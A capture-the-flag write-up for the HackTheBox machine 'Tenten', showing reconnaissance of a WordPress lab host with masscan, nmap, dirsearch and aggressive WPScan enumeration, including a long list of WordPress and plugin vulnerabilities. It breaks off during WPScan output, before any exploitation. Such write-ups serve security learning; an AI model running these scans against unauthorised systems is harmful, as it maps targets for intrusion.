Tenten

From Luniwiki
Jump to: navigation, search

Back

Tenten01.png

Ports scan

u505@kali:~/HTB/Machines/Tenten$ sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.10.10 --rate=1000

Starting masscan 1.0.5 at 2020-03-10 20:14:51 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 80/tcp on 10.10.10.10 Discovered open port 22/tcp on 10.10.10.10
u505@kali:~/HTB/Machines/Tenten$ nmap -sC -sV 10.10.10.10
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-10 16:14 EDT
Nmap scan report for tenten.htb (10.10.10.10)
Host is up (0.038s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 ec:f7:9d:38:0c:47:6f:f0:13:0f:b9:3b:d4:d6:e3:11 (RSA)
|   256 cc:fe:2d:e2:7f:ef:4d:41:ae:39:0e:91:ed:7e:9d:e7 (ECDSA)
|_  256 8d:b5:83:18:c0:7c:5d:3d:38:df:4b:e1:a4:82:8a:07 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.7.3
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Job Portal – Just another WordPress site
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.42 seconds

Port 80

dirsearch

It seems a normal wordpress site. Dirsearch doesn't find anything useful.

u505@kali:~/HTB/Machines/Tenten$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "php,txt" -f -t 50 -u http://10.10.10.10

_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: php, txt | HTTP method: get | Threads: 50 | Wordlist size: 13832
Error Log: /opt/utils/dirsearch/logs/errors-20-03-10_16-18-01.log
Target: http://10.10.10.10
[16:18:01] Starting: [16:18:01] 403 - 290B - /.php [16:18:01] 403 - 293B - /.cache/ [16:18:05] 403 - 299B - /.htpasswd.php [16:18:05] 403 - 299B - /.htpasswd.txt [16:18:21] 403 - 292B - /icons/ [16:18:21] 301 - 0B - /index.php -> http://10.10.10.10/ [16:18:21] 301 - 0B - /index.php/ -> http://10.10.10.10/ [16:18:22] 200 - 19KB - /license.txt [16:18:30] 403 - 300B - /server-status/ [16:18:35] 200 - 0B - /wp-content/ [16:18:35] 403 - 298B - /wp-includes/ [16:18:35] 200 - 0B - /wp-blog-header.php [16:18:35] 500 - 0B - /wp-settings.php [16:18:35] 200 - 0B - /wp-config.php [16:18:35] 200 - 0B - /wp-load.php [16:18:35] 200 - 0B - /wp-cron.php [16:18:35] 200 - 220B - /wp-links-opml.php [16:18:35] 403 - 3KB - /wp-mail.php [16:18:35] 200 - 3KB - /wp-login.php [16:18:35] 200 - 135B - /wp-trackback.php [16:18:35] 302 - 0B - /wp-signup.php -> http://10.10.10.10/wp-login.php?action=register [16:18:35] 302 - 0B - /wp-admin/ -> http://10.10.10.10/wp-login.php?redirect_to=http%3A%2F%2F10.10.10.10%2Fwp-admin%2F&reauth=1 [16:18:35] 405 - 42B - /xmlrpc.php [16:18:35] 405 - 42B - /xmlrpc.php/
Task Completed

WPScan

u505@kali:~/HTB/Machines/Tenten$ wpscan --url http://10.10.10.10 -v --detection-mode aggressive --enumerate dbe,vp,vt,cb,u,m --api-token <token>
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team Version 3.7.8 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________
[+] URL: http://10.10.10.10/ [+] Started: Tue Mar 10 16:23:23 2020
Interesting Finding(s):
[+] http://10.10.10.10/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://10.10.10.10/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100%
[+] http://10.10.10.10/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.7.3 identified (Insecure, released on 2017-03-06). | Found By: Atom Generator (Aggressive Detection) | - http://10.10.10.10/index.php/feed/atom/, <generator uri="https://wordpress.org/" version="4.7.3">WordPress</generator> | Confirmed By: Style Etag (Aggressive Detection) | - http://10.10.10.10/wp-admin/load-styles.php, Match: '4.7.3' | | [!] 45 vulnerabilities identified: | | [!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset | References: | - https://wpvulndb.com/vulnerabilities/8807 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295 | - https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html | - https://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html | - https://core.trac.wordpress.org/ticket/25239 | | [!] Title: WordPress 2.7.0-4.7.4 - Insufficient Redirect Validation | Fixed in: 4.7.5 | References: | - https://wpvulndb.com/vulnerabilities/8815 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9066 | - https://github.com/WordPress/WordPress/commit/76d77e927bb4d0f87c7262a50e28d84e01fd2b11 | - https://wordpress.org/news/2017/05/wordpress-4-7-5/ | | [!] Title: WordPress 2.5.0-4.7.4 - Post Meta Data Values Improper Handling in XML-RPC | Fixed in: 4.7.5 | References: | - https://wpvulndb.com/vulnerabilities/8816 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9062 | - https://wordpress.org/news/2017/05/wordpress-4-7-5/ | - https://github.com/WordPress/WordPress/commit/3d95e3ae816f4d7c638f40d3e936a4be19724381 | | [!] Title: WordPress 3.4.0-4.7.4 - XML-RPC Post Meta Data Lack of Capability Checks | Fixed in: 4.7.5 | References: | - https://wpvulndb.com/vulnerabilities/8817 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9065 | - https://wordpress.org/news/2017/05/wordpress-4-7-5/ | - https://github.com/WordPress/WordPress/commit/e88a48a066ab2200ce3091b131d43e2fab2460a4 | | [!] Title: WordPress 2.5.0-4.7.4 - Filesystem Credentials Dialog CSRF | Fixed in: 4.7.5 | References: | - https://wpvulndb.com/vulnerabilities/8818 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9064 | - https://wordpress.org/news/2017/05/wordpress-4-7-5/ | - https://github.com/WordPress/WordPress/commit/38347d7c580be4cdd8476e4bbc653d5c79ed9b67 | - https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_connection_information.html | | [!] Title: WordPress 3.3-4.7.4 - Large File Upload Error XSS | Fixed in: 4.7.5 | References: | - https://wpvulndb.com/vulnerabilities/8819 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9061 | - https://wordpress.org/news/2017/05/wordpress-4-7-5/ | - https://github.com/WordPress/WordPress/commit/8c7ea71edbbffca5d9766b7bea7c7f3722ffafa6 | - https://hackerone.com/reports/203515 | - https://hackerone.com/reports/203515 | | [!] Title: WordPress 3.4.0-4.7.4 - Customizer XSS & CSRF | Fixed in: 4.7.5 | References: | - https://wpvulndb.com/vulnerabilities/8820 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9063 | - https://wordpress.org/news/2017/05/wordpress-4-7-5/ | - https://github.com/WordPress/WordPress/commit/3d10fef22d788f29aed745b0f5ff6f6baea69af3 | | [!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection | Fixed in: 4.7.6 | References: | - https://wpvulndb.com/vulnerabilities/8905 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14723 | - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/ | - https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48 | - https://github.com/WordPress/WordPress/commit/fc930d3daed1c3acef010d04acc2c5de93cd18ec | | [!] Title: WordPress 2.3.0-4.7.4 - Authenticated SQL injection | Fixed in: 4.7.5 | References: | - https://wpvulndb.com/vulnerabilities/8906 | - https://medium.com/websec/wordpress-sqli-bbb2afcc8e94 | - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/ | - https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48 | - https://wpvulndb.com/vulnerabilities/8905 | | [!] Title: WordPress 2.9.2-4.8.1 - Open Redirect | Fixed in: 4.7.6 | References: | - https://wpvulndb.com/vulnerabilities/8910 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14725 | - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/ | - https://core.trac.wordpress.org/changeset/41398 | | [!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping | Fixed in: 4.7.6 | References: | - https://wpvulndb.com/vulnerabilities/8911 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14719 | - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/ | - https://core.trac.wordpress.org/changeset/41457 | - https://hackerone.com/reports/205481 | | [!] Title: WordPress 4.4-4.8.1 - Path Traversal in Customizer | Fixed in: 4.7.6 | References: | - https://wpvulndb.com/vulnerabilities/8912 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14722 | - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/ | - https://core.trac.wordpress.org/changeset/41397 | | [!] Title: WordPress 4.4-4.8.1 - Cross-Site Scripting (XSS) in oEmbed | Fixed in: 4.7.6 | References: | - https://wpvulndb.com/vulnerabilities/8913 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14724 | - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/ | - https://core.trac.wordpress.org/changeset/41448 | | [!] Title: WordPress 4.2.3-4.8.1 - Authenticated Cross-Site Scripting (XSS) in Visual Editor | Fixed in: 4.7.6 | References: | - https://wpvulndb.com/vulnerabilities/8914 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14726 | - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/ | - https://core.trac.wordpress.org/changeset/41395 | - https://blog.sucuri.net/2017/09/stored-cross-site-scripting-vulnerability-in-wordpress-4-8-1.html | | [!] Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness | Fixed in: 4.7.7 | References: | - https://wpvulndb.com/vulnerabilities/8941 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16510 | - https://wordpress.org/news/2017/10/wordpress-4-8-3-security-release/ | - https://github.com/WordPress/WordPress/commit/a2693fd8602e3263b5925b9d799ddd577202167d | - https://twitter.com/ircmaxell/status/923662170092638208 | - https://blog.ircmaxell.com/2017/10/disclosure-wordpress-wpdb-sql-injection-technical.html | | [!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload | Fixed in: 4.7.8 | References: | - https://wpvulndb.com/vulnerabilities/8966 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092 | - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/ | - https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509 | | [!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping | Fixed in: 4.7.8 | References: | - https://wpvulndb.com/vulnerabilities/8967 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094 | - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/ | - https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de | | [!] Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping | Fixed in: 4.7.8 | References: | - https://wpvulndb.com/vulnerabilities/8968 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17093 | - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/ | - https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a | | [!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing | Fixed in: 4.7.8 | References: | - https://wpvulndb.com/vulnerabilities/8969 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091 | - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/ | - https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c | | [!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS) | Fixed in: 4.7.9 | References: | - https://wpvulndb.com/vulnerabilities/9006 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5776 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9263 | - https://github.com/WordPress/WordPress/commit/3fe9cb61ee71fcfadb5e002399296fcc1198d850 | - https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/ | - https://core.trac.wordpress.org/ticket/42720 | | [!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched) | References: | - https://wpvulndb.com/vulnerabilities/9021 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389 | - https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html | - https://github.com/quitten/doser.py | - https://thehackernews.com/2018/02/wordpress-dos-exploit.html | | [!] Title: WordPress 3.7-4.9.4 - Remove localhost Default | Fixed in: 4.7.10 | References: | - https://wpvulndb.com/vulnerabilities/9053 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10101 | - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/ | - https://github.com/WordPress/WordPress/commit/804363859602d4050d9a38a21f5a65d9aec18216 | | [!] Title: WordPress 3.7-4.9.4 - Use Safe Redirect for Login | Fixed in: 4.7.10 | References: | - https://wpvulndb.com/vulnerabilities/9054 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10100 | - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/ | - https://github.com/WordPress/WordPress/commit/14bc2c0a6fde0da04b47130707e01df850eedc7e | | [!] Title: WordPress 3.7-4.9.4 - Escape Version in Generator Tag | Fixed in: 4.7.10 | References: | - https://wpvulndb.com/vulnerabilities/9055 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10102 | - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/ | - https://github.com/WordPress/WordPress/commit/31a4369366d6b8ce30045d4c838de2412c77850d | | [!] Title: WordPress <= 4.9.6 - Authenticated Arbitrary File Deletion | Fixed in: 4.7.11 | References: | - https://wpvulndb.com/vulnerabilities/9100 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12895 | - https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/ | - http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/ | - https://github.com/WordPress/WordPress/commit/c9dce0606b0d7e6f494d4abe7b193ac046a322cd | - https://wordpress.org/news/2018/07/wordpress-4-9-7-security-and-maintenance-release/ | - https://www.wordfence.com/blog/2018/07/details-of-an-additional-file-deletion-vulnerability-patched-in-wordpress-4-9-7/ | | [!] Title: WordPress <= 5.0 - Authenticated File Delete | Fixed in: 4.7.12 | References: | - https://wpvulndb.com/vulnerabilities/9169 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20147 | - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/ | | [!] Title: WordPress <= 5.0 - Authenticated Post Type Bypass | Fixed in: 4.7.12 | References: | - https://wpvulndb.com/vulnerabilities/9170 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20152 | - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/ | - https://blog.ripstech.com/2018/wordpress-post-type-privilege-escalation/ | | [!] Title: WordPress <= 5.0 - PHP Object Injection via Meta Data | Fixed in: 4.7.12 | References: | - https://wpvulndb.com/vulnerabilities/9171 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20148 | - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/ | | [!] Title: WordPress <= 5.0 - Authenticated Cross-Site Scripting (XSS) | Fixed in: 4.7.12 | References: | - https://wpvulndb.com/vulnerabilities/9172 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20153 | - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/ | | [!] Title: WordPress <= 5.0 - Cross-Site Scripting (XSS) that could affect plugins | Fixed in: 4.7.12 | References: | - https://wpvulndb.com/vulnerabilities/9173 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20150 | - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/ | - https://github.com/WordPress/WordPress/commit/fb3c6ea0618fcb9a51d4f2c1940e9efcd4a2d460 | | [!] Title: WordPress <= 5.0 - User Activation Screen Search Engine Indexing | Fixed in: 4.7.12 | References: | - https://wpvulndb.com/vulnerabilities/9174 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20151 | - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/ | | [!] Title: WordPress <= 5.0 - File Upload to XSS on Apache Web Servers | Fixed in: 4.7.12 | References: | - https://wpvulndb.com/vulnerabilities/9175 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20149 | - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/ | - https://github.com/WordPress/WordPress/commit/246a70bdbfac3bd45ff71c7941deef1bb206b19a | | [!] Title: WordPress 3.7-5.0 (except 4.9.9) - Authenticated Code Execution | Fixed in: 5.0.1 | References: | - https://wpvulndb.com/vulnerabilities/9222 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8942 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8943 | - https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/ | - https://www.rapid7.com/db/modules/exploit/multi/http/wp_crop_rce | | [!] Title: WordPress 3.9-5.1 - Comment Cross-Site Scripting (XSS) | Fixed in: 4.7.13 | References: | - https://wpvulndb.com/vulnerabilities/9230 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9787 | - https://github.com/WordPress/WordPress/commit/0292de60ec78c5a44956765189403654fe4d080b | - https://wordpress.org/news/2019/03/wordpress-5-1-1-security-and-maintenance-release/ | - https://blog.ripstech.com/2019/wordpress-csrf-to-rce/ | | [!] Title: WordPress <= 5.2.2 - Cross-Site Scripting (XSS) in URL Sanitisation | Fixed in: 4.7.14 | References: | - https://wpvulndb.com/vulnerabilities/9867 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16222 | - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/ | - https://github.com/WordPress/WordPress/commit/30ac67579559fe42251b5a9f887211bf61a8ed68 | - https://hackerone.com/reports/339483 | | [!] Title: WordPress <= 5.2.3 - Stored XSS in Customizer | Fixed in: 4.7.15 | References: | - https://wpvulndb.com/vulnerabilities/9908 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17674 | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/ | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html | | [!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts | Fixed in: 4.7.15 | References: | - https://wpvulndb.com/vulnerabilities/9909 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17671 | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/ | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html | - https://github.com/WordPress/WordPress/commit/f82ed753cf00329a5e41f2cb6dc521085136f308 | - https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/ | | [!] Title: WordPress <= 5.2.3 - Stored XSS in Style Tags | Fixed in: 4.7.15 | References: | - https://wpvulndb.com/vulnerabilities/9910 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17672 | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/ | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html | | [!] Title: WordPress <= 5.2.3 - JSON Request Cache Poisoning | Fixed in: 4.7.15 | References: | - https://wpvulndb.com/vulnerabilities/9911 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17673 | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/ | - https://github.com/WordPress/WordPress/commit/b224c251adfa16a5f84074a3c0886270c9df38de | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html | | [!] Title: WordPress <= 5.2.3 - Server-Side Request Forgery (SSRF) in URL Validation | Fixed in: 4.7.15 | References: | - https://wpvulndb.com/vulnerabilities/9912 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17669 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17670 | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/ | - https://github.com/WordPress/WordPress/commit/9db44754b9e4044690a6c32fd74b9d5fe26b07b2 | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html | | [!] Title: WordPress <= 5.2.3 - Admin Referrer Validation | Fixed in: 4.7.15 | References: | - https://wpvulndb.com/vulnerabilities/9913 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17675 | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/ | - https://github.com/WordPress/WordPress/commit/b183fd1cca0b44a92f0264823dd9f22d2fd8b8d0 | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html | | [!] Title: WordPress <= 5.3 - Improper Access Controls in REST API | Fixed in: 4.7.16 | References: | - https://wpvulndb.com/vulnerabilities/9973 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20043 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16788 | - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/ | - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-g7rg-hchx-c2gw | | [!] Title: WordPress <= 5.3 - Stored XSS via Crafted Links | Fixed in: 4.7.16 | References: | - https://wpvulndb.com/vulnerabilities/9975 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20042 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16773 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16773 | - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/ | - https://hackerone.com/reports/509930 | - https://github.com/WordPress/wordpress-develop/commit/1f7f3f1f59567e2504f0fbebd51ccf004b3ccb1d | - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-xvg2-m2f4-83m7 | | [!] Title: WordPress <= 5.3 - Stored XSS via Block Editor Content | Fixed in: 4.7.16 | References: | - https://wpvulndb.com/vulnerabilities/9976 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16781 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16780 | - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/ | - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-pg4x-64rh-3c9v | | [!] Title: WordPress <= 5.3 - wp_kses_bad_protocol() Colon Bypass | Fixed in: 4.7.16 | References: | - https://wpvulndb.com/vulnerabilities/10004 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20041 | - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/ | - https://github.com/WordPress/wordpress-develop/commit/b1975463dd995da19bb40d3fa0786498717e3c53
[i] The main theme could not be detected.
[+] Enumerating Vulnerable Plugins (via Passive Methods) [+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] job-manager | Location: http://10.10.10.10/wp-content/plugins/job-manager/ | Latest Version: 0.7.25 (up to date) | Last Updated: 2015-08-25T22:44:00.000Z | | Found By: Urls In Homepage (Passive Detection) | | [!] 1 vulnerability identified: | | [!] Title: Job Manager <= 0.7.25 - Insecure Direct Object Reference | References: | - https://wpvulndb.com/vulnerabilities/8167 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6668 | - https://vagmour.eu/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin/ | | Version: 7.2.5 (80% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) | - http://10.10.10.10/wp-content/plugins/job-manager/readme.txt
[+] Enumerating Vulnerable Themes (via Aggressive Methods) Checking Known Locations - Time: 00:00:03 <> (325 / 325) 100.00% Time: 00:00:03 [+] Checking Theme Versions (via Aggressive Methods)
[i] Theme(s) Identified:
[+] twentyfifteen | Location: http://10.10.10.10/wp-content/themes/twentyfifteen/ | Latest Version: 2.5 | Last Updated: 2020-02-25T00:00:00.000Z | Readme: http://10.10.10.10/wp-content/themes/twentyfifteen/readme.txt | Style URL: http://10.10.10.10/wp-content/themes/twentyfifteen/style.css | Style Name: Twenty Fifteen | Style URI: https://wordpress.org/themes/twentyfifteen/ | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, straightforward typography is readable on a wide variety of screen sizes, and suitable for multiple languages. We designed it using a mobile-first approach, meaning your content takes center-stage, regardless of whether your visitors arrive by smartphone, tablet, laptop, or desktop computer. | Author: the WordPress team | Author URI: https://wordpress.org/ | License: GNU General Public License v2 or later | License URI: http://www.gnu.org/licenses/gpl-2.0.html | Tags: blog, two-columns, left-sidebar, accessibility-ready, custom-background, custom-colors, custom-header, custom-logo, custom-menu, editor-style, featured-images, microformats, post-formats, rtl-language-support, sticky-post, threaded-comments, translation-ready | Text Domain: twentyfifteen | | Found By: Known Locations (Aggressive Detection) | - http://10.10.10.10/wp-content/themes/twentyfifteen/, status: 500 | | [!] 1 vulnerability identified: | | [!] Title: Twenty Fifteen Theme <= 1.1 - DOM Cross-Site Scripting (XSS) | Fixed in: 1.2 | References: | - https://wpvulndb.com/vulnerabilities/7965 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3429 | - https://blog.sucuri.net/2015/05/jetpack-and-twentyfifteen-vulnerable-to-dom-based-xss-millions-of-wordpress-websites-affected-millions-of-wordpress-websites-affected.html | - https://packetstormsecurity.com/files/131802/ | - https://seclists.org/fulldisclosure/2015/May/41 | | The version could not be determined.
[+] Enumerating Config Backups (via Aggressive Methods) Checking Config Backups - Time: 00:00:00 <===> (21 / 21) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Enumerating DB Exports (via Aggressive Methods) Checking DB Exports - Time: 00:00:00 <=======> (36 / 36) 100.00% Time: 00:00:00
[i] No DB Exports Found.
[+] Enumerating Medias (via Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected) Brute Forcing Attachment IDs - Time: 00:00:00 <> (0 / 100) 0.00% ETA: ??:??:? Brute Forcing Attachment IDs - Time: 00:00:00 <> (1 / 100) 1.00% ETA: 00:00:1 Brute Forcing Attachment IDs - Time: 00:00:00 <> (2 / 100) 2.00% ETA: 00:00:0 Brute Forcing Attachment IDs - Time: 00:00:00 <> (6 / 100) 6.00% ETA: 00:00:0 Brute Forcing Attachment IDs - Time: 00:00:00 <> (7 / 100) 7.00% ETA: 00:00:0 Brute Forcing Attachment IDs - Time: 00:00:00 <> (12 / 100) 12.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:00 <> (17 / 100) 17.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:00 <> (22 / 100) 22.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:00 <> (27 / 100) 27.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:00 <> (32 / 100) 32.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:00 <> (37 / 100) 37.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:00 <> (42 / 100) 42.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:00 <> (47 / 100) 47.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (52 / 100) 52.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (57 / 100) 57.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 